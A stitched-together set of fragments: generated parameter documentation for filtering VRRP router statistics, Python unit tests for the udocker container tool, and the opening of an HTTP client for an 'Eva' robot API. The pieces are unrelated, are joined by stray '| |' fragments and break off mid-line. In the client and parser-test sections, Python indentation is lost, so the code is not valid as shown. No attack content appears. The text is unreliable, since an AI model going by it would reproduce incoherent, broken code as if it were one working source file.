:param op_VrrpAdvertiseRcvd: The operator to apply to the field VrrpAdvertiseRcvd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAdvertiseRcvd: The received advertise of the Vrrp router statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpAdvertiseRcvd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpAdvertiseRcvd: If op_VrrpAdvertiseRcvd is specified, the field named in this input will be compared to the value in VrrpAdvertiseRcvd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAdvertiseRcvd must be specified if op_VrrpAdvertiseRcvd is specified.
:type val_f_VrrpAdvertiseRcvd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAdvertiseRcvd: If op_VrrpAdvertiseRcvd is specified, this value will be compared to the value in VrrpAdvertiseRcvd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAdvertiseRcvd must be specified if op_VrrpAdvertiseRcvd is specified.
:type val_c_VrrpAdvertiseRcvd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpAuthFailures: The operator to apply to the field VrrpAuthFailures. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAuthFailures: The total number of authentication failures occurred in the Vrrp router statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpAuthFailures: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpAuthFailures: If op_VrrpAuthFailures is specified, the field named in this input will be compared to the value in VrrpAuthFailures using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAuthFailures must be specified if op_VrrpAuthFailures is specified.
:type val_f_VrrpAuthFailures: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAuthFailures: If op_VrrpAuthFailures is specified, this value will be compared to the value in VrrpAuthFailures using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAuthFailures must be specified if op_VrrpAuthFailures is specified.
:type val_c_VrrpAuthFailures: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpAuthTypeMismatch: The operator to apply to the field VrrpAuthTypeMismatch. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAuthTypeMismatch: The mismatch authentication type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpAuthTypeMismatch: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpAuthTypeMismatch: If op_VrrpAuthTypeMismatch is specified, the field named in this input will be compared to the value in VrrpAuthTypeMismatch using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAuthTypeMismatch must be specified if op_VrrpAuthTypeMismatch is specified.
:type val_f_VrrpAuthTypeMismatch: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAuthTypeMismatch: If op_VrrpAuthTypeMismatch is specified, this value will be compared to the value in VrrpAuthTypeMismatch using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAuthTypeMismatch must be specified if op_VrrpAuthTypeMismatch is specified.
:type val_c_VrrpAuthTypeMismatch: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpBecomeMaster: The operator to apply to the field VrrpBecomeMaster. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpBecomeMaster: The master of the Vrrp Router Statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpBecomeMaster: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpBecomeMaster: If op_VrrpBecomeMaster is specified, the field named in this input will be compared to the value in VrrpBecomeMaster using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpBecomeMaster must be specified if op_VrrpBecomeMaster is specified.
:type val_f_VrrpBecomeMaster: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpBecomeMaster: If op_VrrpBecomeMaster is specified, this value will be compared to the value in VrrpBecomeMaster using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpBecomeMaster must be specified if op_VrrpBecomeMaster is specified.
:type val_c_VrrpBecomeMaster: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpInvalidAuthType: The operator to apply to the field VrrpInvalidAuthType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpInvalidAuthType: The Invalid Authentication type of Vrrp Router Statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpInvalidAuthType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpInvalidAuthType: If op_VrrpInvalidAuthType is specified, the field named in this input will be compared to the value in VrrpInvalidAuthType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpInvalidAuthType must be specified if op_VrrpInvalidAuthType is specified.
:type val_f_VrrpInvalidAuthType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpInvalidAuthType: If op_VrrpInvalidAuthType is specified, this value will be compared to the value in VrrpInvalidAuthType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpInvalidAuthType must be specified if op_VrrpInvalidAuthType is specified.
:type val_c_VrrpInvalidAuthType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpInvalidTypePktsRcvd: The operator to apply to the field VrrpInvalidTypePktsRcvd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpInvalidTypePktsRcvd: The packet received with Invalid Type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpInvalidTypePktsRcvd: String
| ``api version min:`` None
| ``api version max:`` | |
= udoc.do_rmi(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.isprotected_imagerepo.return_value = True
status = udoc.do_rmi(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.isprotected_imagerepo.return_value = False
status = udoc.do_rmi(mock_cmdp)
self.assertTrue(status)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_21_do_protect(self, mock_local, mock_msg, mock_dioapi,
                       mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
    """Test21 Udocker().do_protect()."""
    self._init()
    mock_msg.level = 0

    # Missing mandatory command line options -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    self.assertFalse(cli.do_protect(mock_cmdp))

    # Container id resolves but protect_container() fails -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_local.protect_container.return_value = False
    self.assertFalse(cli.do_protect(mock_cmdp))

    # Container id resolves and protect_container() succeeds -> success.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_local.protect_container.return_value = True
    self.assertTrue(cli.do_protect(mock_cmdp))

    # Neither a container id nor an image name -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("", "TAG")
    mock_local.get_container_id.return_value = ""
    mock_local.protect_imagerepo.return_value = True
    self.assertFalse(cli.do_protect(mock_cmdp))

    # No container id but a valid image repository -> success.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = ""
    mock_local.protect_imagerepo.return_value = True
    self.assertTrue(cli.do_protect(mock_cmdp))
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_22_do_unprotect(self, mock_local, mock_msg, mock_dioapi,
                         mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
    """Test22 Udocker().do_unprotect()."""
    self._init()
    mock_msg.level = 0

    # Missing mandatory command line options -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    self.assertFalse(cli.do_unprotect(mock_cmdp))

    # Container id resolves but unprotect_container() fails -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_local.unprotect_container.return_value = False
    self.assertFalse(cli.do_unprotect(mock_cmdp))

    # Container id resolves and unprotect_container() succeeds -> success.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_local.unprotect_container.return_value = True
    self.assertTrue(cli.do_unprotect(mock_cmdp))

    # No container id: falls back to unprotecting the image repository.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = ""
    mock_local.unprotect_imagerepo.return_value = True
    self.assertTrue(cli.do_unprotect(mock_cmdp))
    self.assertTrue(mock_local.unprotect_imagerepo.called)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_23_do_name(self, mock_local, mock_msg, mock_dioapi,
                    mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
    """Test23 Udocker().do_name()."""
    self._init()
    mock_msg.level = 0

    # Missing mandatory command line options -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    mock_cmdp.get.side_effect = [""] * 4
    mock_chkimg.return_value = ("IMAGE", "TAG")
    self.assertFalse(cli.do_name(mock_cmdp))

    # Target container does not exist -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "NAME", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = ""
    self.assertFalse(cli.do_name(mock_cmdp))

    # Container exists but set_container_name() fails -> failure.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "NAME", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_local.set_container_name.return_value = False
    self.assertFalse(cli.do_name(mock_cmdp))

    # Container exists and set_container_name() succeeds -> success.
    cli = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "NAME", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_local.set_container_name.return_value = True
    self.assertTrue(cli.do_name(mock_cmdp))
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_24_do_rmname(self, mock_local, mock_msg, mock_dioapi,
                      mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
    """Test24 Udocker().do_rmname().

    Covers: missing options, deletion failure, and the success path.
    """
    self._init()
    mock_msg.level = 0
    # Missing mandatory options -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    # BUG FIX: side_effect lists had a missing comma ("" "" collapses to
    # one string, dropping an item); all items are now explicit.
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    status = udoc.do_rmname(mock_cmdp)
    self.assertFalse(status)
    # Name deletion fails in the repository -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["NAME", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.del_container_name.return_value = False
    status = udoc.do_rmname(mock_cmdp)
    self.assertFalse(status)
    # Success path.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["NAME", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.del_container_name.return_value = True
    status = udoc.do_rmname(mock_cmdp)
    self.assertTrue(status)
@mock.patch('udocker.json')
@mock.patch('udocker.ContainerStructure')
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_25_do_inspect(self, mock_local, mock_msg, mock_dioapi,
                       mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg,
                       mock_cstruct, mock_json):
    """Test25 Udocker().do_inspect().

    Covers: missing options, no container attributes, the --print (DIR)
    path, and the JSON-attributes path.
    """
    self._init()
    mock_msg.level = 0
    # Missing mandatory options -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    # BUG FIX: side_effect lists had a missing comma ("" "" collapses to
    # one string, dropping an item); all items are now explicit.
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    status = udoc.do_inspect(mock_cmdp)
    self.assertFalse(status)
    # No container attributes available -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_cstruct.return_value.get_container_attr.return_value = ("", "")
    status = udoc.do_inspect(mock_cmdp)
    self.assertFalse(status)
    # Print-directory path -> success.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "PRINT", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_cstruct.return_value.get_container_attr.return_value = ("DIR", "")
    status = udoc.do_inspect(mock_cmdp)
    self.assertTrue(status)
    # JSON-attributes path -> success.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.get_container_id.return_value = "123"
    mock_cstruct.return_value.get_container_attr.return_value = (
        "", "JSON")
    status = udoc.do_inspect(mock_cmdp)
    self.assertTrue(status)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_26_do_verify(self, mock_local, mock_msg, mock_dioapi,
                      mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
    """Test26 Udocker().do_verify().

    Covers: missing options, bad image spec, repo cd failure, and the
    successful verification path.
    """
    self._init()
    mock_msg.level = 0
    # Missing mandatory options -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    # BUG FIX: side_effect lists had a missing comma ("" "" collapses to
    # one string, dropping an item); all items are now explicit.
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    status = udoc.do_verify(mock_cmdp)
    self.assertFalse(status)
    # Invalid image spec -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("", "")
    status = udoc.do_verify(mock_cmdp)
    self.assertFalse(status)
    # Cannot enter the image repository -> failure.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.cd_imagerepo.return_value = False
    status = udoc.do_verify(mock_cmdp)
    self.assertFalse(status)
    # Success path.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = False
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    mock_chkimg.return_value = ("IMAGE", "TAG")
    mock_local.cd_imagerepo.return_value = True
    mock_local.verify_image.return_value = True
    status = udoc.do_verify(mock_cmdp)
    self.assertTrue(status)
# @mock.patch('udocker.ExecutionMode')
# @mock.patch('udocker.CmdParser')
# @mock.patch('udocker.KeyStore')
# @mock.patch('udocker.DockerLocalFileAPI')
# @mock.patch('udocker.DockerIoAPI')
# @mock.patch('udocker.Msg')
# @mock.patch('udocker.LocalRepository')
# def test_27_do_setup(self, mock_local, mock_msg, mock_dioapi,
# mock_dlocapi, mock_ks, mock_cmdp, mock_exec):
# """Test27 Udocker().do_setup()."""
# self._init()
# mock_msg.level = 0
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "", "" "", "", ]
# mock_local.cd_container.return_value = False
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_exec.set_mode.return_value = False
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_exec.set_mode.return_value = True
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "P1", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_local.isprotected_container.return_value = True
# mock_exec.set_mode.return_value = True
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "P1", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_local.isprotected_container.return_value = False
# mock_exec.set_mode.return_value = True
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
@mock.patch('udocker.UdockerTools')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_28_do_install(self, mock_local, mock_msg, mock_cmdp,
                       mock_utools):
    """Test28 Udocker().do_install().

    Exercises the flag combinations: none, --purge, --purge --force,
    and --force alone.
    """
    self._init()
    mock_msg.level = 0
    # No flags: purge must not run.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    # BUG FIX: side_effect lists had a missing comma ("" "" collapses to
    # one string, dropping an item); all items are now explicit.
    mock_cmdp.get.side_effect = ["", "", "", "", ""]
    udoc.do_install(mock_cmdp)
    self.assertFalse(mock_utools.return_value.purge.called)
    # --purge flag.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    mock_cmdp.get.side_effect = ["", "--purge", "", "", ""]
    mock_utools.reset_mock()
    mock_cmdp.reset_mock()
    udoc.do_install(mock_cmdp)
    # NOTE(review): Mock auto-creates `install.called_with`, so these
    # assertTrue() checks are always truthy; they should likely be
    # install.assert_called_with(...).  Kept as-is pending confirmation
    # of do_install()'s actual call signature.
    self.assertTrue(mock_utools.return_value.install.called_with(False))
    # --purge --force flags.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    mock_cmdp.get.side_effect = ["", "--purge", "--force", "", ""]
    mock_utools.reset_mock()
    mock_cmdp.reset_mock()
    udoc.do_install(mock_cmdp)
    self.assertTrue(mock_utools.return_value.install.called_with(True))
    # --force alone.
    udoc = udocker.Udocker(mock_local)
    mock_cmdp.missing_options.return_value = True
    mock_cmdp.get.side_effect = ["", "", "--force", "", ""]
    mock_utools.reset_mock()
    mock_cmdp.reset_mock()
    udoc.do_install(mock_cmdp)
    self.assertTrue(mock_utools.return_value.install.called_with(True))
@mock.patch('udocker.Msg.out')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.LocalRepository')
def test_29_do_help(self, mock_local, mock_cmdp, mock_msgout):
    """Test29 Udocker().do_help() emits output via Msg.out."""
    self._init()
    udoc = udocker.Udocker(mock_local)
    # BUG FIX: side_effect list had a missing comma ("" "" collapses to
    # one string, dropping an item); all items are now explicit.
    mock_cmdp.get.side_effect = ["run", "help", "", "", ""]
    udoc.do_help(mock_cmdp)
    self.assertTrue(mock_msgout.called)
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.LocalRepository')
def test_30_do_version(self, mock_local, mock_cmdp):
    """Test30 Udocker().do_version() returns a version value."""
    self._init()
    udoc = udocker.Udocker(mock_local)
    # BUG FIX: side_effect list had a missing comma ("" "" collapses to
    # one string, dropping an item); all items are now explicit.
    mock_cmdp.get.side_effect = ["run", "", "", "", ""]
    version = udoc.do_version(mock_cmdp)
    self.assertIsNotNone(version)
class CmdParserTestCase(unittest.TestCase):
"""Test CmdParserTestCase() command line interface."""
@classmethod
def setUpClass(cls):
    """Prepare the shared test environment once for this test class."""
    # set_env() is test scaffolding defined elsewhere in this file;
    # presumably it seeds configuration/environment -- verify there.
    set_env()
def test_01__init(self):
    """Test01 CmdParser() Constructor."""
    cmdp = udocker.CmdParser()
    # A fresh parser starts with an empty argv and empty bookkeeping
    # tables for both the general and the command option sections.
    self.assertEqual(cmdp._argv, "")
    for table in (cmdp._argv_split, cmdp._argv_consumed_options,
                  cmdp._argv_consumed_params):
        self.assertIsInstance(table, dict)
    self.assertEqual(cmdp._argv_split['CMD'], "")
    for section in ('GEN_OPT', 'CMD_OPT'):
        self.assertEqual(cmdp._argv_split[section], [])
        self.assertEqual(cmdp._argv_consumed_options[section], [])
        self.assertEqual(cmdp._argv_consumed_params[section], [])
def test_02_parse(self):
    """Test02 CmdParser().parse()."""
    command_line = ("udocker run --bindhome --hostauth --hostenv -v /sys"
                    " -v /proc -v /var/run -v /dev"
                    " --user=jorge --dri myfed firefox")
    cmdp = udocker.CmdParser()
    self.assertTrue(cmdp.parse(command_line))
def test_03_missing_options(self):
    """Test03 CmdParser().missing_options()."""
    cmdp = udocker.CmdParser()
    cmdp.parse("udocker run --bindhome --hostauth --hostenv -v /sys"
               " -v /proc -v /var/run -v /dev"
               " --user=jorge --dri myfed firefox")
    # A parsed command line yields a (possibly empty) list of leftovers.
    self.assertIsInstance(cmdp.missing_options(), list)
def test_04_get(self):
"""Test04 CmdParser().get()."""
cmdp = udocker.CmdParser()
cmdp.declare_options("-v= -e= -w= -u= -i -t -a")
cmdp.parse("udocker run --bindhome "
"--hostauth --hostenv -v | |
import json
import time
import logging
import requests
from .robot_state import RobotState
from .eva_errors import eva_error, EvaError, EvaAutoRenewError
# TODO add more granular logs using __logger
# TODO lots of sleeps in control_* de to the robot state being updated slowly after starting an action, can this be improved?
class EvaHTTPClient:
"""
Eva HTTP client
- host_ip (string): The IP address of an Eva, i.e. 192.168.1.245
- api_token (string): A valid API token for accessing Eva, retrievable from the Choreograph config page
- custom_logger (logging.Logger): An *optional* logger, if not supplied the client will instantiate its own
- request_timeout (float): An *optional* time in seconds to wait for a request to resolve, defaults to 5
- renew_period (int): An *optional* time in seconds between renew session requests, defaults to 20 minutes
"""
def __init__(self, host_ip, api_token, custom_logger=None, request_timeout=5, renew_period=60 * 20):
self.host_ip = host_ip
self.api_token = api_token
self.request_timeout = request_timeout
if custom_logger is not None:
self.__logger = custom_logger
else:
self.__logger = logging.getLogger('evasdk.EvaHTTPClient:{}'.format(host_ip))
self.session_token = None
self.renew_period = renew_period
self.__last_renew = time.time()
if not 0 < renew_period < 30 * 60:
raise ValueError('Session must be renewed before expiring (30 minutes)')
def api_call_with_auth(self, *args, **kwargs):
    """Issue an API request, transparently re-authenticating and renewing.

    A 401 response triggers one session re-creation and a single retry.
    On the non-401 path the session is renewed when it is older than
    renew_period but younger than the 30 minute expiry.
    """
    r = self.__api_request(*args, **kwargs)
    # Try creating a new session if we get an auth error and retrying the failed request
    if r.status_code == 401:
        self.__logger.debug('Creating a new session and retrying failed request')
        self.auth_create_session()
        return self.__api_request(*args, **kwargs)
    # NOTE(review): a retried request returns above, so the auto-renew
    # check below never runs on the retry path -- confirm intentional.
    if self.renew_period < time.time() - self.__last_renew < 30 * 60:
        self.__logger.debug('Automatically renewing session')
        try:
            self.auth_renew_session()
        except EvaError as e:
            raise EvaAutoRenewError('Failed to automatically renew, got error {}'.format(str(e)))
    return r
def __api_request(self, method, path, payload=None, headers=None, timeout=None):
    """Perform one raw HTTP request against the robot's v1 API.

    When *headers* is omitted, an Authorization header carrying the
    current session token is added.  Passing an explicit dict (even an
    empty one, as auth_create_session does for its unauthenticated
    request) is respected verbatim.
    """
    # BUG FIX: was `if not headers:`, which also matched an explicitly
    # passed empty dict and overwrote it with an Authorization header,
    # defeating auth_create_session's `headers={}`.
    if headers is None:
        headers = {'Authorization': 'Bearer {}'.format(self.session_token)}
    return requests.request(
        method, 'http://{}/api/v1/{}'.format(self.host_ip, path),
        data=payload, headers=headers,
        timeout=(timeout or self.request_timeout),
    )
# API VERSIONS
def api_versions(self):
r = self.__api_request('GET', 'versions')
if r.status_code != 200:
eva_error('api_versions request error', r)
return r.json()
# AUTH
def auth_renew_session(self):
self.__logger.debug('Renewing session token {}'.format(self.session_token))
# Bypass api_call_with_auth to avoid getting in a renewal loop
r = self.__api_request('POST', 'auth/renew')
if r.status_code == 401:
self.session_token = None
self.auth_create_session()
elif r.status_code != 204:
eva_error('auth_renew_session request error', r)
else:
self.__last_renew = time.time()
def auth_create_session(self):
self.__logger.debug('Creating session token')
# Bypass api_call_with_auth to avoid getting in a 401 loop
r = self.__api_request('POST', 'auth', payload=json.dumps({'token': self.api_token}), headers={})
if r.status_code != 200:
eva_error('auth_create_session request error', r)
self.__last_renew = time.time()
self.session_token = r.json()['token']
self.__logger.debug('Created session token {}'.format(self.session_token))
return self.session_token
def auth_invalidate_session(self):
self.__logger.debug('Invalidating session token {}'.format(self.session_token))
r = self.__api_request('DELETE', 'auth')
if r.status_code != 204:
eva_error('auth_invalidate_session request error', r)
self.session_token = None
# DATA
# TODO consider adding type for switch between flat and object modes
def data_snapshot(self, mode='flat'):
r = self.api_call_with_auth('GET', 'data/snapshot?mode=' + mode)
if r.status_code != 200:
eva_error('data_snapshot request error', r)
return r.json()['snapshot']
def data_snapshot_property(self, prop, mode='object'):
snapshot = self.data_snapshot(mode=mode)
if prop in snapshot:
return snapshot[prop]
else:
eva_error('data_snapshot_property request error, property {} not found'.format(prop))
def data_servo_positions(self):
return self.data_snapshot_property('servos.telemetry.position')
# USERS
def users_get(self):
r = self.api_call_with_auth('GET', 'users')
if r.status_code != 200:
eva_error('users_get request error', r)
return r.json()
# CONFIG
def config_update(self, update):
r = self.api_call_with_auth(
'POST', 'config/update', update,
headers={'Content-Type': 'application/x.automata-update'}, timeout=30
)
if r.status_code != 200:
eva_error('config_update error', r)
return r.json()
# GPIO
def gpio_set(self, pin, status):
r = self.__globals_editing(keys='outputs.' + pin, values=status)
if r.status_code != 200:
eva_error('gpio_set error', r)
def gpio_get(self, pin, pin_type):
if (pin not in ['a0', 'a1', 'd0', 'd1', 'd2', 'd3', 'ee_d0', 'ee_d1', 'ee_a0', 'ee_a1']):
eva_error('gpio_get error, no such pin ' + pin)
if (pin_type not in ['input', 'output']):
eva_error('gpio_get error, pin_type must be "input" or "output"')
